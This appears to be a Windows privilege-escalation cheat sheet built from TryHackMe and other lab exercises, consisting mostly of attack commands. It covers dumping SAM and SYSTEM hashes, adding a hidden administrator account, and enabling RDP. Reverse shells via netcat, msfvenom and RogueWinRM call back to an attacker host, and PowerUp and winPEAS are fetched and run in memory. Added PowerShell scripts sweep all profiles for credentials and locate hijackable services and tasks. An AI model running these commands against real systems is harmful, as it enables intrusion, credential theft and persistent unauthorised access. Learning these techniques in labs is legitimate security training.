Copy info from here: https://tryhackme.com/room/windowsprivesc20
Gathering Info
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
dir "c:\program files"
dir "c:\program files (x86)"
wmic service get name,startname
wmic service get name,pathname,startname | findstr "Program Files"
Find text in file
type C:\Windows\path\to\file\$FILE | findstr $STRING
Find passwords
reg query HKLM /f password /t REG_SZ /s
whoami /priv
PrintSpoofer - abuses SeImpersonatePrivilege; works on Windows 10 and Server 2016/2019
Harvesting Passwords from Usual Spots
Might be able to find interesting files by looking at what was recently accessed. Start -> run -> recent.
Powershell history
Examples
Victim(cmd)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Examples
runas opens a new console window, so you need a GUI session (e.g. RDP) to see the prompt it spawns.
Victim(cmd)
cmdkey /list
runas /savecred /user:$DOMAIN\$USERNAME cmd.exe
Examples
Retrieve the saved password stored in the saved PuTTY session under your profile.
Victim(cmd)
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
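The commands in this section each check one spot for the current user only. As an added example (not part of the original notes or of the TryHackMe room), the PowerShell below sweeps the same three spots in one pass: the PSReadline history of every profile under C:\Users (readable only where that user's ACL already allows it), the saved credentials that cmdkey reports, and the PuTTY sessions in HKCU that carry a stored proxy password. The function names and the list of credential-looking patterns are my own choices.

```powershell
# Added example, not from the original notes or the TryHackMe room: sweep the usual
# credential spots for every profile instead of only %userprofile%. Assumes it runs
# in the low-privileged user's session; other profiles are read only where NTFS
# permissions already allow it (access errors are silently skipped).

function Get-HistoryHits {
    # PSReadline history of every profile, filtered to credential-looking lines.
    $relative = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
    $patterns = 'pass(word|wd)?', 'cmdkey', 'runas', 'net use', 'credential', 'securestring', 'api[_-]?key'
    foreach ($dir in Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
        $hist = Join-Path -Path $dir.FullName -ChildPath $relative
        if (-not (Test-Path -LiteralPath $hist)) { continue }
        Get-Content -LiteralPath $hist -ErrorAction SilentlyContinue |
            Select-String -Pattern $patterns |
            ForEach-Object { [pscustomobject]@{ Kind = 'History'; Source = $hist; Value = $_.Line.Trim() } }
    }
}

function Get-SavedCredentials {
    # Parse `cmdkey /list`: every entry is a "Target:" line followed by "Type:" and "User:".
    # The password itself is never printed, but runas /savecred will use it for us.
    $target = $null
    foreach ($line in (cmdkey /list 2>$null)) {
        if ($line -match '^\s*Target:\s*(.+)$') { $target = $Matches[1].Trim(); continue }
        if ($target -and $line -match '^\s*User:\s*(.+)$') {
            $user = $Matches[1].Trim()
            [pscustomobject]@{ Kind = 'SavedCred'; Source = $target; Value = "runas /savecred /user:$user cmd.exe" }
            $target = $null
        }
    }
}

function Get-PuttyProxyPasswords {
    # PuTTY keeps sessions under HKCU; a saved proxy password is stored in clear text.
    $root = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    if (-not (Test-Path -Path $root)) { return }
    foreach ($key in Get-ChildItem -Path $root) {
        $p = Get-ItemProperty -Path $key.PSPath
        if (-not $p.ProxyPassword) { continue }
        $session = [uri]::UnescapeDataString($key.PSChildName)   # PuTTY URL-encodes session names
        [pscustomobject]@{ Kind = 'PuTTY'; Source = "$session -> $($p.HostName)"; Value = "$($p.ProxyUsername):$($p.ProxyPassword)" }
    }
}

function Invoke-CredentialSweep {
    # One flat list, so the result can be piped to Format-Table or Export-Csv.
    @(Get-HistoryHits) + @(Get-SavedCredentials) + @(Get-PuttyProxyPasswords)
}

Invoke-CredentialSweep | Format-Table -AutoSize -Wrap
```

Other users' HKCU hives are not loaded unless they are logged on, so the PuTTY check only covers the current user; the history and cmdkey checks are the ones that widen the search.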
See hidden files
Examples
Anthem
System and Sam
Download system and sam
Examples
Kali(WinRM, e.g. evil-winrm: reg save runs on the target and needs admin rights or SeBackupPrivilege; download is the shell's built-in file transfer)
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
Dump hashes
Examples
Kali
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
Add User & Assign Group Memberships
Victim
net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f
forceguest=0 selects the "classic" network access model, so remote logons authenticate as the real account instead of being mapped to Guest.
Enable RDP
Victim
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Add user to remote access group
Examples
"Remote Management Users" grants WinRM/PowerShell remoting, not RDP; the RDP group is "Remote Desktop Users".
Victim(cmd)
net localgroup "Remote Management Users" $USER /add
Scheduled Tasks
Examples
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or is using a binary you can modify.
Scheduled tasks can be listed from the command line with schtasks and no options. To retrieve detailed information about a task (the action it runs and the account it runs as), use:
Victim(cmd)
schtasks /query /tn $TASK /fo list /v
Check whether you can write to the action's target:
Victim(cmd)
icacls c:\tasks\schtask.bat
Kali
Victim
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn $TASK
Abusing Service Misconfigurations
Examples
Insecure Permissions on Service Executable
Get the flag on svcusr1's desktop
Victim(cmd)
sc qc WindowsScheduler
Victim(cmd)
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://$KALI:81/rev-svc.exe -O rev-svc.exe
Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.
Victim(Powershell)
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
Kali
Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.
Victim(cmd)
sc stop windowsscheduler
sc start windowsscheduler
OR
Victim(Powershell)
sc.exe stop windowsscheduler
sc.exe start windowsscheduler
As a result, you'll get a reverse shell with svcusr1 privileges on the Kali listener.
Unquoted Service Paths
Examples
Victim(cmd)
sc qc "disk sorter enterprise"
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://$KALI:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Kali
Victim(cmd)
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
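The scheduled-task, service-executable and unquoted-path procedures above all reduce to one question: does the current user have write access to a path that a higher-privileged principal will execute? As an added example that is not part of the original notes or of the room, the PowerShell below answers that for every scheduled task action and every service on the box. For unquoted paths it enumerates the intermediate files Windows tries first (for `C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe` that is `C:\MyPrograms\Disk.exe`, then `C:\MyPrograms\Disk Sorter.exe`) and checks whether their parent directory is writable. The writability test is ACL-based rather than trying to open the file, because a running service binary is locked even when its ACL allows writing. Function names are mine; Get-ScheduledTask needs PowerShell 4 / Windows 8 or Server 2012 or later.

```powershell
# Added example, not from the original notes or the TryHackMe room: list every scheduled
# task action and service binary the current user can overwrite, plus unquoted service
# paths whose intermediate directory is writable. Assumes PowerShell 4+ (Get-ScheduledTask,
# Get-CimInstance); function names are my own.

$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$script:MySids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

# Rights that let us replace the file or rewrite its ACL. The two hex bits are GENERIC_ALL
# and GENERIC_WRITE, which appear on inherited entries (e.g. CREATOR OWNER) as raw masks.
$script:WriteMask = [int][System.Security.AccessControl.FileSystemRights]'Write,Modify,FullControl,TakeOwnership,ChangePermissions' -bor 0x10000000 -bor 0x40000000

function Test-Writable {
    # ACL-based on purpose: opening a running service binary for write fails with a
    # sharing violation even when the ACL would allow it (you rename it instead, as above).
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
        Where-Object { $script:MySids -contains $_.IdentityReference.Value -and
                       (([int]$_.FileSystemRights -band $script:WriteMask) -ne 0) }
    if ($rules | Where-Object { $_.AccessControlType -eq 'Deny' }) { return $false }
    return [bool]($rules | Where-Object { $_.AccessControlType -eq 'Allow' })
}

function Get-UnquotedPathCandidates {
    # For 'C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe' Windows tries
    # C:\MyPrograms\Disk.exe, then 'C:\MyPrograms\Disk Sorter.exe', before the real file.
    param([string]$PathName)
    if ($PathName -match '^\s*"') { return @() }                       # quoted: not vulnerable
    $exe = if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { ($PathName -split ' ')[0] }
    if ($exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    for ($i = 0; $i -lt $parts.Count - 1; $i++) { ($parts[0..$i] -join ' ') + '.exe' }
}

function Get-ServiceTargets {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        if ($path -match '^"([^"]+)"') { $exe = $Matches[1] }          # quoted binary, args follow
        elseif ($path -match '^(.*?\.exe)') { $exe = $Matches[1] }     # unquoted, cut at .exe
        else { $exe = ($path -split ' ')[0] }
        if (Test-Writable -Path $exe) {
            [pscustomobject]@{ Kind = 'WritableServiceBinary'; Name = $svc.Name; RunsAs = $svc.StartName; Target = $exe }
        }
        foreach ($cand in Get-UnquotedPathCandidates -PathName $path) {
            if (Test-Writable -Path (Split-Path -Path $cand -Parent)) {
                [pscustomobject]@{ Kind = 'UnquotedPath'; Name = $svc.Name; RunsAs = $svc.StartName; Target = $cand }
            }
        }
    }
}

function Get-TaskTargets {
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }                     # only Exec actions have a command
            $targets = @([Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"')))
            if ($action.Arguments) {                                   # e.g. cmd.exe /c C:\tasks\schtask.bat
                $targets += @([regex]::Matches($action.Arguments, '[A-Za-z]:\\[^"\s]+\.(exe|bat|cmd|ps1|vbs|dll)') | ForEach-Object { $_.Value })
            }
            foreach ($t in $targets) {
                if (Test-Writable -Path $t) {
                    [pscustomobject]@{ Kind = 'WritableTaskTarget'; Name = $task.TaskName; RunsAs = $task.Principal.UserId; Target = $t }
                }
            }
        }
    }
}

Get-TaskTargets
Get-ServiceTargets
```

The RunsAs column is what makes a hit worth acting on: a writable binary that runs as the same low-privileged user gains nothing, while LocalSystem or another user (svcusr1 above) is the escalation. A finding of kind UnquotedPath still needs the service to be restartable by you (sc stop/start, or a reboot if it is auto-start).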
Insecure Service Permissions
Examples
Victim(cmd)
cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://$KALI:81/rev-svc3.exe -O rev-svc3.exe
Kali
Victim(Powershell)
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService
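accesschk checks one service at a time and needs the Sysinternals binary on the box. As an added example that is not part of the original notes or of the room, the PowerShell below does the same check for every service with nothing but `sc.exe sdshow`: it parses the SDDL string by hand and flags ACEs that grant a SID in the current token SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or a generic all/write right (any of which lets you repoint binPath= as above), and records whether the same token can also start and stop the service. The alias table and function names are my own; the rights masks are the documented service access-right values.

```powershell
# Added example, not from the original notes or the TryHackMe room: the accesschk -qlc
# check for every service, done by parsing the SDDL that `sc.exe sdshow` prints (sc.exe,
# not sc, because PowerShell aliases sc to Set-Content). Needs READ_CONTROL on each
# service, which the default service DACL grants to interactive users.

$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

# SDDL two-letter aliases that show up in service DACLs, mapped to SIDs so they can be
# compared against the current token's group SIDs.
$aliasToSid = @{ WD = 'S-1-1-0'; AU = 'S-1-5-11'; BU = 'S-1-5-32-545'; IU = 'S-1-5-4'
                 BA = 'S-1-5-32-544'; SY = 'S-1-5-18'; SU = 'S-1-5-6'; AN = 'S-1-5-7' }

function Get-ServiceRightFlags {
    # Service-specific meaning of the SDDL rights field: DC = SERVICE_CHANGE_CONFIG (0x2),
    # WD = WRITE_DAC (0x40000), WO = WRITE_OWNER (0x80000), GA/GW = generic all/write;
    # RP = SERVICE_START (0x10), WP = SERVICE_STOP (0x20). The field is either a run of
    # two-letter codes or a raw hex mask.
    param([string]$Rights)
    $reconfigMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
    if ($Rights -match '^0x[0-9a-fA-F]+$') {
        $mask = [Convert]::ToInt64($Rights.Substring(2), 16)
        return @{ Reconfigure = (($mask -band $reconfigMask) -ne 0); StartStop = (($mask -band 0x30) -ne 0) }
    }
    $codes = [regex]::Matches($Rights, '..') | ForEach-Object { $_.Value }
    return @{ Reconfigure = [bool]($codes | Where-Object { $_ -in 'DC','WD','WO','GA','GW' })
              StartStop   = [bool]($codes | Where-Object { $_ -in 'RP','WP' }) }
}

function Get-WeakServiceDacl {
    foreach ($svc in Get-Service) {
        $sddl = ((sc.exe sdshow $svc.Name 2>$null) -join '').Trim()
        $d = $sddl.IndexOf('D:'); if ($d -lt 0) { continue }          # access denied or no DACL
        $s = $sddl.IndexOf('S:', $d)                                    # SACL follows the DACL, if printed
        $dacl = if ($s -ge 0) { $sddl.Substring($d + 2, $s - $d - 2) } else { $sddl.Substring($d + 2) }
        $allowed = @{ Reconfigure = $false; StartStop = $false }; $denied = $false; $grantors = @()
        # ACE layout: (type;flags;rights;object_guid;inherit_guid;sid)
        foreach ($ace in [regex]::Matches($dacl, '\(([^;]*);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)')) {
            $sid = $ace.Groups[4].Value
            if ($aliasToSid.ContainsKey($sid)) { $sid = $aliasToSid[$sid] }
            if ($mySids -notcontains $sid) { continue }                 # this ACE is not about us
            $flags = Get-ServiceRightFlags -Rights $ace.Groups[3].Value
            switch ($ace.Groups[1].Value) {
                'A' { if ($flags.Reconfigure) { $allowed.Reconfigure = $true; $grantors += $ace.Groups[4].Value }
                      if ($flags.StartStop)   { $allowed.StartStop = $true } }
                'D' { if ($flags.Reconfigure) { $denied = $true } }
            }
        }
        if ($allowed.Reconfigure -and -not $denied) {
            [pscustomobject]@{ Service = $svc.Name; GrantedTo = ($grantors -join ','); CanStartStop = $allowed.StartStop
                               Next = "sc.exe config $($svc.Name) binPath= <payload> obj= LocalSystem" }
        }
    }
}

Get-WeakServiceDacl | Format-Table -AutoSize
```

If you run this from an elevated admin prompt every service will match through the BA entry, which is correct but uninteresting; the useful run is from the low-privileged shell, where a hit means an Everyone, Authenticated Users, Users or per-user ACE was added to the service.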
Abusing dangerous privileges
Examples
Kali
RogueWinRM abuses SeImpersonatePrivilege: it listens as a fake WinRM service on port 5985 (so the real WinRM service must not already be running), triggers the BITS service to connect to it, and impersonates the SYSTEM token it gets.
Victim(Browser)
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe $KALI 4442"
Bypassing UAC
Examples:
Bypassing UAC
Bypassing Applocker
Examples:
Load PowerUp.ps1 into memory (nothing is written to disk, and AppLocker script rules are evaluated against files on disk).
Kali
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81
Add the following line at the bottom of PowerUp.ps1 so it invokes all checks automatically once downloaded:
PowerUp.ps1
Invoke-AllChecks
Victim(powershell)
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')
Kali
echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d
Kali
xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T
Privilege Escalation
Automated Enumeration Tools
BloodHound (source checkout; the apt package is used in the SharpHound section below)
git clone https://github.com/BloodHoundAD/BloodHound.git
Juicy Potato
Examples
Retro
Download Juicy Potato to your attack machine.
Upload Juicy Potato to the target (ex: via FTP, SMB, HTTP, etc.).
Create a reverse shell and upload it to the target (ex: via FTP, SMB, HTTP, etc.), then use Juicy Potato to execute it.
Needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. The DCOM trick it relies on was closed in Windows 10 1809 / Server 2019; use PrintSpoofer or RoguePotato there.
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
JuicyPotato.exe -l 5050 -p C:\path\to\reverse-shell.exe -t *
-l is the local COM server port; -t * tries both CreateProcessWithTokenW and CreateProcessAsUser.
PowerUp.ps1
Examples
Privilege Escalation Retro
Setup
Kali
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python2 -m SimpleHTTPServer 81
Victim(cmd)
certutil -urlcache -f http://$KALI:81/PowerUp.ps1 PowerUp.ps1
Victim(powershell)
. .\PowerUp.ps1
Invoke-AllChecks
OR
Victim(powershell)
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')
Windows Exploit Suggester
Examples
HackPark
Setup
Run command then paste output back to Kali in a file called systeminfo.txt
Victim
Kali
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt
--update downloads the Microsoft bulletin spreadsheet into the current directory; the .xls is named after the date you ran it, so adjust the --database argument accordingly.
WinPeas
Examples
HackPark
Setup
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 82
Victim
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:82/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exe
SharpHound
Examples
Post-Exploitation Basics
Add this line to SharpHound.ps1 before transferring so I could run the command right away
Victim
powershell -ep bypass
.\SharpHound.ps1
Kali
apt-get install bloodhound
neo4j console
bloodhound --no-sandbox
Pre-built queries in the BloodHound UI:
Find all Domain Admins
List all Kerberoastable Accounts
Powerview
Examples
Post-Exploitation Basics
Victim
Run below to be able to run PowerView commands.
powershell -ep bypass
. .\Downloads\PowerView.ps1
Enumerate the domain users.
Get-NetUser | select cn
Enumerate the domain groups.
Get-NetGroup -GroupName *admin*
Find Shared folders.
Get Operating systems on the network.
Get-NetComputer -fulldata | select operatingsystem